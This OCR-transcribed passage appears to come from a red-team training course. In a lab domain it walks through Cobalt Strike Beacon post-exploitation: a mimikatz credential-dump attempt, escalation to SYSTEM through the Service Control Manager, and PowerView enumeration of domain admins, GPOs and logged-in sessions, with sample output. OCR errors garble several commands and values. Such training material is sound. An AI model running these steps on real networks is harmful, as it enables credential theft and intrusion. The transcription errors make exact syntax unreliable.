SeChangeNotifyPrivilege: SE PRIVILEGE ENABLED BY DEFAULT, SE PRIVILEGE ENABLED
SeUndockPrivilege: DISABLED
SeIncreaselWorkingSetPrivilege: DISABLED
SeTimeZonePrivilege: DISABLED

and this will cause actions that require privileged access to still fail.

beacon> logonpasswords

[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296858 bytes

[+] received output:

ERROR kuhl m sekurlsa acquirelSA ; Handle on memory (0x00000005)

So even though we're in a high integrity session, we really can't do much. elevate svc-exe can be used to execute another Beacon as SYSTEM by utilising the Service Control Manager.

beacon> elevate svc-exe tcp-4444-local
Started service 96d@481 on
[+] established link to child beacon: 18.10.17.132

SYSTEM *
WKSTN-2 @ 1140

This Beacon will have the necessary token privileges to run post-ex command such as logonpasswords. The moral of this story is to research into the specific bypass techniques before you use them.
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Domain Reconnaissance

This section will review (at a relatively high level) some of the information you can enumerate from the current domain as a standard domain user. We'll cover many of these areas (domain trusts, Kerberos abuses,

GPO abuses, etc) in much more detail when we get to those specific sections. For now, we'll see some of the different tooling that can be used to query the domain, and how we can obtain targeted information.

It's worth noting that performing domain recon in a high integrity process is not required, and in some cases (token duplication) can be detrimental.

COMPLETE & CONTINUE —
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PowerView

PowerView has long been the de-facto tool for domain enumeration.

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.psl
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Get-Domain

Returns a domain object for the current domain or the domain specified with ~-Domain. Useful information includes the domain name, the forest name and the domain controllers.

beacon> powershell Get-Domaln

Forest
DomainControllers
Children

DomainMode
DomainModel evel

Parent

PdcRoleOwner
RidRoleOwner
InfrastructureRoleOwner

Name

: cyberbotic.1io

: {dc-2.dev.cyberbotic.io}

A

L

: Unknown

: 7

: cyberbotic.1o

: dc-2.dev.cyberbotic.io
: dc-2.dev.cyberbotic.io
: dc-2.dev.cyberbotic.io

: dev.cyberbotic.io
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Get-DomainController

Returns the domain controllers for the current or specified domain.

beacon> powershell Get-DomainController | select Forest, Name, 0OSVersion | 1

Forest : cyberbotic.io
Name : dc-2.dev.cyberbotic.io

OSVersion : Windows Server 2016 Datacenter
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Get-ForestDomain

Returns all domains for the current forest or the forest specified by -Forest.

beacon> powershell Get-ForestDomaln

Forest
DomainControllers
Children

DomainMode
DomainModel evel

Parent

PdcRoleOwner
RidRoleOwner
InfrastructureRoleOwner

Name

Forest
DomainControllers
Children

DomainMode
DomainModelevel

Parent

PdcRoleOwner
RidRoleOwner
InfrastructureRoleOwner

Name

cyberbotic.1o0

: {dc-1.cyberbotic.io}
: {dev.cyberbotic.io}

: Unknown
: 7

: dc-1.cyberbotic.io
: dc-1.cyberbotic.io
: dc-1.cyberbotic.io

: cyberbotic.io

cyberbotic.1io

: {dc-2.dev.cyberbotic.io}
c )

: Unknown

=

: cyberbotic.io

: dc-2.dev.cyberbotic.1o0

: dc-2.dev.cyberbotic.io

: dc-2.dev.cyberbotic.1o0

: dev.cyberbotic.lio
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Get-DomainPolicyData

Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.

beacon> powershell Get-DomainPolicyData | select -ExpandProperty SystemAccess

MinimumPasswordAge
MaximumPasswordAge
MinimumPasswordlLength
PasswordComplexity
PasswordHistorySize
LockoutBadCount
RequirelLogonToChangePassword
ForceLogoffWhenHourExpire
ClearTextPassword

LSAAnonymousNameLookup
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Get-DomainUser

Return all (or specific) user(s). To only return specific properties, use ~-Properties. By default, all user objects for the current domain are returned, use -Identity to return a specific user.

beacon> powershell Get-DomainUser -Identity nlamb -Properties DisplayName, MemberOf | f1

displayname : Nina Lamb

memberof : {CN=Roaming Users,CN=Users,DC=dev,DC=cyberbotic,DC=10, CN=Group Policy Creator
Owners,CN=Users,DC=dev,DC=cyberbotic,DC=10, CN=Domain Admins,CN=Users,DC=dev,DC=cyberbotic,DC=10,
CN=Administrators,CN=Builtin,DC=dev,DC=cyberbotic,DC=i0}

TIP: If you run Get-DomainUser withoutthe -Identity parameter, prepare to wait a while.
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Get-DomainComputer

Return all computers or specific computer objects.

beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

dnshostname

dc-2.dev.cyberbotic.io
nix-1
srv-1.dev.cyberbotic.io
srv-2.dev.cyberbotic.io
wkstn-1.dev.cyberbotic.io

wkstn-2.dev.cyberbotic.io
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Get-DomainQU

Search for all organization units (OUs) or specific OU objects.

beacon> powershell Get-DomainOU -Properties Name | sort -Property Name

name
Domain Controllers
Servers
Tier 1
Tier 2

Workstations
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Get-DomainGroup

Return all groups or specific group objects.

beacon> powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName

samaccountname

Domain Admins
Key Admins
DnsAdmins

Oracle Admins
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Get-DomainGroupMember

Return the members of a specific domain group.

beacon> powershell Get-DomainGroupMember -Identity "Domain Admins” | select MemberDistinguishedName

MemberDistinguishedName

CN=Nina Lamb,CN=Users,DC=dev,DC=cyberbotic,DC=10
CN=Administrator,CN=Users,DC=dev,DC=cyberbotic,DC=1i0
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Get-DomainGPO

Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use -ComputerIdentity.

beacon> powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
displayname

Default Domain Controllers Policy
Default Domain Policy

Roaming Users

Tier 1 Admins

Tier 2 Admins

Windows Defender

Windows Firewall

beacon> powershell Get-DomainGPO -ComputerIdentity wkstn-1 -Properties DisplayName | sort -Property DisplayName
displayname

Default Domain Policy
LAPS

PowerShell Logging
Roaming Users

Windows Defender

Windows Firewall
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Get-DomainGPOLocalGroup

Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.

beacon> powershell Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

GPODisplayName GroupName

Tier 1 Admins DEV\Developers
Tier 2 Admins DEV\1lst Line Support
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Get-DomainGPOUserLocalGroupMapping

Enumerates the machines where a specific domain user/group is a member of a specific local group.

beacon> powershell Get-DomainGPOUserlLocalGroupMapping -lLocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

ObjectName GPODisplayName ContainerName ComputerName

1st Line Support Tier 2 Admins {0OU=Tier 2,0U=Servers,DC=dev,DC=cyberbotic,DC=i0} {srv-2.dev.cyberbotic.io}
Developers Tier 1 Admins {OU=Tier 1,0U=Servers,DC=dev,DC=cyberbotic,DC=1i0} {srv-1.dev.cyberbotic.io}
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Find-DomainUserLocation

Enumerates all machines and queries the domain for users of a specified group (default Domain Admins). Then finds domain machines where those users are logged into.

beacon> powershell Find-DomainUserlocation | select UserName, SessionFromName

UserName SessionFromName

nlamb wkstn-2.dev.cyberbotic.io

OPSEC: Querying every machine in the domain is obviously very noisy.
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Get-NetSession

Returns session information for the local (or a remote) machine (where CName is the source IP).

beacon> powershell Get-NetSession -ComputerName dc-2 | select CName, UserName

UserName

\10.18.17.231 bfarmer
\W160.108.17.132 nlamb
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Get-DomainTrust

Return all domain trusts for the current or specified domain.

beacon> powershell Get-DomainTrust

So